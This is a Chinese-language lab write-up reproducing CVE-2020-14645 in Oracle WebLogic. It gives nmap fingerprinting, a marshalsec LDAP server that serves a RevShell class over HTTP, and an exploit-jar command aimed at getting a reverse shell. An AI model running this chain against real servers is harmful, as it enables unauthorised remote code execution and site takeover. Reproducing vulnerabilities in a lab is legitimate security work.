影响版本
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core).
受影响版本:10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 以及 14.1.1.0.0.
影响:简单的漏洞利用即可允许攻击者通过IIOP未授权访问Oracle WebLogic T3。攻击者可利用漏洞接管网站。 CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
环境搭建
docker pull z1du/weblogic12214jdk8u181
windows10
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html12
漏洞验证
工具准备:
git clone git@github.com:mbechler/marshalsec.git
mvn clean package -DskipTests
漏洞poc测试
通过nmap检测版本
nmap -n -v -Pn –sV IP地址 -p 端口 --script=/usr/share/nmap/scripts/weblogic-t3-info.nse
PORT STATE SERVICE
7001/tcp open afs3-callback
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.2.1.4)
测试RCE
rce编译
编译:
RevShell.java
编译class文件
javac RevShell.java开启http服务,挂在class文件
python3 -m http.server 5001访问本地http://192.168.31.102:5001/RevShell.class 200,可访问挂载成功
配置开启LDAP服务
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.[-a] [-v] [-t] [ [<arguments…>]]
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.31.102:5001/#RevShell 1099
rce 命令执行
java -jar CVE-2020-14645.jar 192.168.31.102:1099/#RevShell http://test.com:7001
Weblogic version: 12.2.1.4
反弹shell